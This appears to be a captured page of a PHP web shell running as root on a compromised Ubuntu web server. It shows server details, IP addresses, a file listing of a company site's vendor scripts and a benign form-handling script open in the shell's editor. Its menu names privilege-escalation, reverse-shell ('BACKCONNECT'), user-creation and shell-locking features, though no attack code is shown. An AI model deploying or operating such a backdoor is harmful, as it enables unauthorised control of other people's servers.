Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
callegariplasticos /
vendors /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap
[ DIR ]
drwxr-xr-x
fontawesome
[ DIR ]
drwxr-xr-x
jquery
[ DIR ]
drwxr-xr-x
linericon
[ DIR ]
drwxr-xr-x
nice-select
[ DIR ]
drwxr-xr-x
nouislider
[ DIR ]
drwxr-xr-x
owl-carousel
[ DIR ]
drwxr-xr-x
themify-icons
[ DIR ]
drwxr-xr-x
contact.js
1.48
KB
-rw-r--r--
jquery.ajaxchimp.min.js
4.71
KB
-rw-r--r--
jquery.form.js
18.38
KB
-rw-r--r--
jquery.validate.min.js
20.57
KB
-rw-r--r--
mail-script.js
461
B
-rw-r--r--
skrollr.min.js
12.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mail-script.js
$(document).ready(function(){var form=$('#myForm');var submit=$('.submit-btn');var alert=$('.alert-msg');form.on('submit',function(e){e.preventDefault();$.ajax({url:'enviar.php',type:'POST',dataType:'html',data:form.serialize(),beforeSend:function(){alert.fadeOut();submit.html('Sending....');},success:function(data){alert.html(data).fadeIn();form.trigger('reset');submit.attr("style","display: none !important");;},error:function(e){console.log(e)}});});});
Close